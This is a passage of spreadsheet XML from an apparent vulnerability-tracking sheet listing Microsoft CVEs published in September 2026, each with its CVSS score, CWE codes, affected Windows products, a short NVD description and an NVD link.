      <c r="K8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88" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr"/>
      <c r="Q888" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69758</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr"/>
      <c r="Q889" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69785</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr"/>
      <c r="Q890" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr"/>
      <c r="Q891" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr"/>
      <c r="Q892" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr"/>
      <c r="Q893" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr"/>
      <c r="Q894" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr"/>
      <c r="Q895" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K89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896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr"/>
      <c r="Q896" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R896" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K89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7" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr"/>
      <c r="Q897" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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98" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr"/>
      <c r="Q898" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R898" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr"/>
      <c r="Q899" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R899" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr"/>
      <c r="Q900" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R900" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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01" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr"/>
      <c r="Q901" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K902" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr"/>
      <c r="Q902" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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03" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr"/>
      <c r="Q903" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr"/>
      <c r="Q904" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R904" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="S904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D905" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F905" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K90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05" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr"/>
      <c r="Q905" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D906" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F906" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K906" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L906" s="5" t="inlineStr"/>
